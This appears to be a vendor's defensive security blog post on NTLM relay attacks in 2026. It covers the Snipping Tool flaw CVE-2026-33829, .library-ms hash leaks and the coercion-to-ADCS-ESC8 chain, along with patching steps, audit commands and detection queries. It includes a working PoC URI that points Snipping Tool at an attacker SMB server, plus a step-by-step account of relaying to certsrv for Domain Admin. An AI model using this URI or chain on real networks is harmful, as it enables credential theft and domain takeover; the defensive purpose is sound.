NTLM Relay in 2026: Microsoft Called Time of Death. Attackers Wrote the Appeal.
Defensive Playbook — April 25, 2026
TL;DR
- CVE-2026-33829 (Windows Snipping Tool, CVSS 7.5): PoC dropped this week — a single browser-triggered URI silently coerces SMB authentication and exfiltrates Net-NTLM hashes. Patch: April 14, 2026 Patch Tuesday. Many orgs are still unpatched.
- CVE-2025-24054 (NTLM hash disclosure via .library-ms): exploited in the wild against government targets in Poland and Romania within 8 days of the patch. CISA KEV listed.
- Microsoft's NTLM deprecation Phase 3 (October 2026) blocks NTLMv1 SSO by default. NTLMv2 — the version used in relay attacks — remains permitted indefinitely.
- The classic Coercion → NTLM Relay → ADCS ESC8 → Domain Admin chain still works against the majority of enterprise environments running Server 2019/2022.
- Detection is achievable but requires specific Event IDs most SOC teams don't monitor.
- Bottom line: NTLM relay is not a legacy concern. It is the most consistently successful path from network access to full domain compromise in 2026 red team engagements.
Background: Why a "Deprecated" Protocol Is Still Breaking Enterprises
There is a particular kind of institutional overconfidence that comes from a vendor announcing deprecation. Security teams see "Microsoft to retire NTLM" in their news feed, file it under handled, and move on. The attackers filing it under opportunity are having a much better year.
Microsoft's NTLM deprecation is real and proceeding on schedule. It is also, in its current form, insufficient to protect the enterprise installed base from one of the most productive post-exploitation techniques in the attacker arsenal.
The numbers tell the story: as of early 2026, the majority of enterprise domain controllers run Windows Server 2019 or 2022, not Server 2025. The organizations most dependent on legacy application stacks — the ones that genuinely cannot migrate off NTLM in a quarter — are precisely the organizations with the largest Active Directory environments and the most valuable crown jewels to relay toward.
This week's release of a public proof-of-concept for CVE-2026-33829 (Windows Snipping Tool NTLM hash leak) is a sharp reminder that the coercion problem isn't waiting for Microsoft's deprecation calendar. New NTLM coercion primitives continue to emerge from unexpected attack surfaces — screenshot tools, file pickers, office automation handlers — and each one feeds the same downstream relay chain that has been delivering Domain Admin access for half a decade.
The Deprecation Timeline and Its Structural Gaps
Microsoft's three-phase NTLM deprecation plan:
| Phase | Timeline | What Actually Changes |
|-------|----------|-----------------------|
| Phase 1 | Now (Win 11 24H2 / Server 2025) | Enhanced auditing, NTLMv1 disabled by default in new installs |
| Phase 2 | H2 2026 | IAKerb + Local KDC reduce NTLM fallback in specific scenarios |
| Phase 3 | October 2026 | BlockNTLMv1SSO registry key set to Enforce by default |
The critical detail that gets buried in every breathless "NTLM is dying" headline: Phase 3 enforces the block on NTLMv1 SSO authentication. NTLMv2 — the protocol version used in essentially every modern relay attack — remains permitted. Full NTLM elimination does not have a fixed public enforcement date because the compatibility surface is simply too large: legacy applications, network-attached storage devices with firmware constraints, workgroup systems, and cross-forest authentication scenarios all depend on NTLM in ways that a single registry key cannot resolve.
The Phase 3 announcement will generate another round of "NTLM is dead" coverage. Relay attacks will continue.
Attack Chain Anatomy: Coercion → Relay → ADCS ESC8 → Domain Admin
Understanding why this chain remains so effective requires walking through each link.
Step 1: Coercion — Forcing Authentication
The attacker, starting with only network access and no credentials, needs to coerce a privileged account (typically a computer account with $ suffix) into initiating an NTLM authentication attempt toward an attacker-controlled listener.
CVE-2026-33829: The Snipping Tool Vector (April 2026)
The newly public PoC demonstrates the attack with a single URI:
```text
ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast
```
When a victim opens this link — through a phishing email, a malicious HTML page with an embedded auto-trigger, or a document with a hyperlink — Windows Snipping Tool launches and silently attempts to load the remote resource over SMB. The ms-screensketch deep link protocol handler accepts a filePath parameter with no input validation, allowing UNC path injection to an attacker-controlled server. Windows NTLM authentication fires transparently in the background. The victim sees only the Snipping Tool opening, which is visually plausible for dozens of social engineering pretexts (HR document review, IT badge crop requests, corporate wallpaper changes).
Disclosed March 23, 2026. Patched April 14, 2026. Public PoC released April 21, 2026. Most enterprise patch cycles run 30–60 days after Patch Tuesday.
CVE-2025-24054: The .library-ms Vector (Still Relevant)
A right-click on a malicious .library-ms file triggers automatic NTLM authentication. Exploited against government institutions within 8 days of patch release. CISA KEV-listed. The same hash-capture outcome.
Other active coercion primitives (no CVE required): PrinterBug / SpoolSample (SMB coercion via Print Spooler), PetitPotam (HTTP coercion via EFS MS-EFSRPC), ShadowCoerce (MS-FSRVP), DFSCoerce (MS-DFSNM). Most of these require no authentication against a default Server 2019/2022 configuration.
Step 2: NTLM Relay — Forwarding the Credential
The attacker runs ntlmrelayx (part of Impacket) configured to relay captured authentication to a target service. The tool intercepts the incoming NTLM negotiation from the coerced system and forwards it in real time to the target before the session times out.
Key consideration: SMB signing blocks relay over SMB to most domain-joined workstations and servers on modern defaults. The attacker bypasses this by targeting HTTP-based services, where NTLM signing is not enforced. The highest-value target in most environments is waiting in exactly this unprotected state.
Step 3: ADCS ESC8 — Certificate Request as Domain Admin
Active Directory Certificate Services Web Enrollment (certsrv) authenticates via NTLM over HTTP. By default, it requires no signing or channel binding. This is the ESC8 misconfiguration documented by SpecterOps in Certified Pre-Owned (2021) and still present in the vast majority of enterprise ADCS deployments.
The relay looks like this in practice:
1. Attacker captures NTLM authentication from a domain controller computer account (coerced via PetitPotam or any of the above)
2. ntlmrelayx forwards the captured authentication to http://<CA-server>/certsrv/certfnsh.asp
3. The CA server authenticates the relayed credential as the domain controller computer account
4. Attacker requests a certificate with a SAN (Subject Alternative Name) for a Domain Admin account
5. Certificate issued — the ADCS CA signed it because NTLM authentication appeared valid
Total elapsed time in a practiced engagement: 8 minutes.
Step 4: Certificate → Domain Admin
The attacker uses the issued certificate to request a Kerberos TGT for the Domain Admin via PKINIT. No passwords, no hashes, no EDR-triggering pass-the-hash — just a legitimate certificate request to Active Directory.
On Windows Server 2025, this specific path has meaningful new mitigations (certificate binding enforcement). On Server 2019/2022 — the realistic enterprise baseline — it still works.
CVE-2026-33829: Technical Indicators and Patch Status
| Field | Value |
|-------|-------|
| CVE | CVE-2026-33829 |
| CVSS | 7.5 (High) |
| Affected | Windows Snipping Tool (all builds prior to April 14, 2026 Patch Tuesday) |
| Attack Vector | Network / Social Engineering |
| Privileges Required | None |
| User Interaction | Required (one click) |
| Patch Available | Yes — April 14, 2026 Patch Tuesday |
| Public PoC | Yes — Black Arrow Security (GitHub) |
| CISA KEV | Not yet listed as of April 25, 2026 |
Protocol handler: ms-screensketch
Vulnerable parameter: filePath — accepts arbitrary UNC paths without validation
Authentication leak: Net-NTLMv2 hash via automatic SMB connection to attacker-controlled server
IOCs / Indicators
Network (for CVE-2026-33829 exploitation):
- Unexpected outbound SMB (port 445) or NetBIOS (port 139) connections from workstation processes, particularly SnippingTool.exe
- Outbound connections to external IP addresses on port 445 from workstations (should be blocked at perimeter in most environments; absence of these blocks is itself a finding)
- NTLM authentication events with source process SnippingTool.exe in Windows Security event logs
Active Directory (for ESC8 relay):
- Event ID 4886: Certificate Services received a certificate request (on CA server) — correlate with domain controller computer accounts requesting user certificates
- Event ID 4887: Certificate Services approved a certificate request — flag certificates issued for user accounts where the requesting principal is a computer account ($)
- Event ID 4769 (Kerberos Service Ticket): PKINIT-based TGT requests for high-privilege accounts immediately following a 4886/4887 sequence from an unusual source
Process-level (coercion via SnippingTool):
Image: C:\Windows\SystemApps\Microsoft.ScreenSketch_...\SnippingTool.exe
Network connection: destination = <external or unusual internal IP>:445
Lyrie Take
NTLM relay persists because it sits at the intersection of three structural problems that no single vendor fix can resolve simultaneously: legacy protocol dependencies, unsigned HTTP services, and the ergonomics of PKI misuse in AD CS.
What makes this attack class particularly dangerous in 2026 is the coercion surface expansion. The SnippingTool vulnerability is the latest in a long sequence of unexpected protocol handler abuses — each one adding a new social engineering pretext to a fundamentally unchanged downstream relay chain. The attack didn't evolve; only the entry point did.
Microsoft's deprecation roadmap is sincere but insufficient for the 2026 threat timeline. Enterprises on Server 2019/2022 — the clear majority of production deployments — have no automatic protection on the critical NTLM relay-to-ADCS path. The Phase 3 enforcement in October 2026 blocks NTLMv1, not NTLMv2. The window between "PoC released" and "enterprise patched" consistently runs 30–60 days. In that window, with a public PoC, NTLM relay is an open door.
Lyrie's autonomous detection engine monitors for the characteristic NTLM coercion sequences in network telemetry — unexpected SMB authentication from non-server processes, anomalous PKINIT certificate requests, and ESC8-pattern relay against ADCS HTTP endpoints — at machine speed, without waiting for a human analyst to correlate Event IDs across three separate log sources. The 8-minute engagement window that red teams cite as their benchmark is, for Lyrie, less than one detection cycle.
Defender Playbook
Immediate (This Week)
1. Patch CVE-2026-33829 now.
The April 14, 2026 Patch Tuesday update addresses the Snipping Tool vulnerability. With a public PoC available, exploitation risk is elevated. Verify patch deployment via:
```powershell
# April 2026 cumulative update — verify the KB for your OS version
Get-HotFix -Id KB5055523
```
2. Block outbound SMB at the perimeter.
Outbound connections to external IPs on port 445 should be blocked at the firewall. Many organizations have this rule; many don't. Verify it exists and is enforced. CVE-2026-33829 only works if the coerced SMB connection reaches an attacker server.
3. Audit ADCS Web Enrollment exposure.
Run the following on any system with ADCS installed:
```powershell
Get-CimInstance -ClassName Win32_Service -Filter "Name='certsvc'"
# Then check: is the Web Enrollment role (certsrv) installed and accessible?
# If you don't have a documented business requirement for it, remove it.
```
Short-Term (This Month)
4. Enable EPA (Extended Protection for Authentication) on ADCS HTTP endpoints.
This is the direct mitigation for ESC8. It binds NTLM authentication to the TLS channel, preventing relay from a different TLS session. Configure via IIS on the CA server for the certsrv virtual directory.
5. Enable ADCS audit logging.
Without Event IDs 4886 and 4887 collected from CA servers, ESC8 relay is completely invisible in logs. Verify collection:
```powershell
auditpol /get /subcategory:"Certification Services"
# Should show: Success and Failure
```
Forward these events to your SIEM. Create an alert: 4887 (certificate approved) where requester is a computer account AND subject SAN != the computer account itself.
6. Enable SMB signing enterprise-wide.
Domain-joined systems have SMB signing negotiated by default; workgroup systems and some network appliances often don't. Audit via:
```powershell
Get-SmbServerConfiguration | Select RequireSecuritySignature
# Should be True on all servers
```
7. Block NTLM authentication for sensitive services.
Use Security Policy → Network Security → Restrict NTLM to configure outbound NTLM restrictions for high-value servers. Document exceptions before enforcing.
Medium-Term (This Quarter)
8. Deploy Windows Server 2025 for domain controllers.
Server 2025 ships with certificate binding enforcement (KB5014754) enabled by default, which breaks the ESC8-to-PKINIT chain even if NTLM relay succeeds. This is the single most impactful architectural change available.
9. Enumerate remaining coercion primitives.
Run Coercer (open source) against your internal network from an unauthenticated starting position. It will enumerate which coercion endpoints are active. Every positive result is an open door to the relay chain.
10. Monitor for ms-screensketch protocol handler abuse.
If you run endpoint telemetry (Sysmon, CrowdStrike, Defender for Endpoint), add a detection rule for:
- Process: SnippingTool.exe
- Event: Network connection initiated
- Destination: Any IP that is not an internal storage or content delivery host
Detection Query (Sentinel / KQL)
```kql
// ESC8 relay detection: certificate approved for user SAN from computer account
SecurityEvent
| where EventID in (4886, 4887)
| where AccountType == "Machine" // SecurityEvent labels computer accounts "Machine"
| extend CertSubject = extract("Subject: (.+?)\\n", 1, EventData)
| where CertSubject !contains "$" // SAN doesn't match the computer account
| project TimeGenerated, Computer, Account, CertSubject, EventID
| order by TimeGenerated desc
```

```kql
// NTLM coercion from unexpected processes
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("SnippingTool.exe", "explorer.exe", "winword.exe")
| where RemotePort == 445
| where RemoteIPType == "Public"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort
```
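The alert rule from playbook step 5 and the first KQL query, implemented as an added Python example (not code from the original post or from Lyrie) over constructed 4886/4887 records; the CertEvent fields are a simplified stand-in for the EventData of real Certificate Services events.

```python
"""ESC8 alert logic over AD CS audit events (Event IDs 4886/4887).

Added example, not from the original post. Rule implemented: a 4887
(certificate approved) whose requesting principal is a computer account ($)
and whose issued subject/SAN does not name that computer itself. Records are
constructed; field names are a simplified stand-in for real EventData.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class CertEvent:
    event_id: int   # 4886 = request received, 4887 = request approved
    ca_host: str    # CA server that logged the event
    requester: str  # principal that authenticated to certsrv, e.g. "CORP\\DC01$"
    subject: str    # subject CN or SAN UPN of the requested certificate


def is_computer_account(principal: str) -> bool:
    """Computer accounts carry a trailing '$' on the sAMAccountName."""
    return principal.rsplit("\\", 1)[-1].endswith("$")


def subject_is_self(requester: str, subject: str) -> bool:
    """Autoenrollment issues a machine cert whose subject names the machine
    (CN or DNS name). Anything else issued to a computer account is suspect."""
    host = requester.rsplit("\\", 1)[-1].rstrip("$").lower()
    return host in subject.lower()


def esc8_alerts(events: list[CertEvent]) -> list[CertEvent]:
    """Return approved (4887) requests that match the ESC8 relay pattern."""
    return [
        e for e in events
        if e.event_id == 4887
        and is_computer_account(e.requester)
        and not subject_is_self(e.requester, e.subject)
    ]


# Constructed sample: benign DC autoenrollment, an ESC8-pattern issuance, a user request.
SAMPLE_EVENTS = [
    CertEvent(4886, "CA01", "CORP\\DC01$", "dc01.corp.local"),
    CertEvent(4887, "CA01", "CORP\\DC01$", "dc01.corp.local"),
    CertEvent(4886, "CA01", "CORP\\DC01$", "administrator@corp.local"),
    CertEvent(4887, "CA01", "CORP\\DC01$", "administrator@corp.local"),
    CertEvent(4887, "CA01", "CORP\\jdoe", "jdoe@corp.local"),
]

if __name__ == "__main__":
    for hit in esc8_alerts(SAMPLE_EVENTS):
        print(f"ALERT ESC8 on {hit.ca_host}: {hit.requester} obtained cert for {hit.subject}")
```

Only the second DC01$ issuance is flagged: the first is the computer's own machine certificate, and the user request is not from a computer account at all.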
Sources
1. CyberSecurityNews — "PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability" (April 21, 2026): https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/
2. Hive Security — "NTLM Relay in 2026: Microsoft Declared It Dead. Attackers Didn't Get the Memo." (April 21, 2026): https://hivesecurity.gitlab.io/blog/ntlm-relay-attack-detect-2026/
3. News9Live — "Windows Snipping Tool Flaw Exposed: PoC Exploit Leaks NTLM Hashes Silently" (April 21, 2026): https://www.news9live.com/technology/tech-news/windows-snipping-tool-flaw-exposed-poc-exploit-leaks-ntlm-hashes-silently-2961154
4. ADCS Security — "ESC8: NTLM Relay to ADCS HTTP Endpoints": https://www.adcs-security.com/attacks/esc8
5. SecureW2 — "Active Directory Certificate Services Best Practices for Security Hardening" (April 2026): https://securew2.com/blog/active-directory-certificate-services-ad-cs-explained
6. Diamatix — "Windows Snipping Tool NTLM Hash Leak Vulnerability CVE-2026-33829 Explained" (April 21, 2026): https://diamatix.com/windows-snipping-tool-ntlm-hash-leak-vulnerability/
7. Microsoft MSRC — CVE-2025-24054 Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054
8. Check Point Research — Active exploitation of CVE-2025-24054 in government campaigns (March 2025): https://research.checkpoint.com/2025/ntlm-hash-leaking/
Lyrie.ai Cyber Research Division — Senior Analyst Desk
Lyrie Verdict
Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.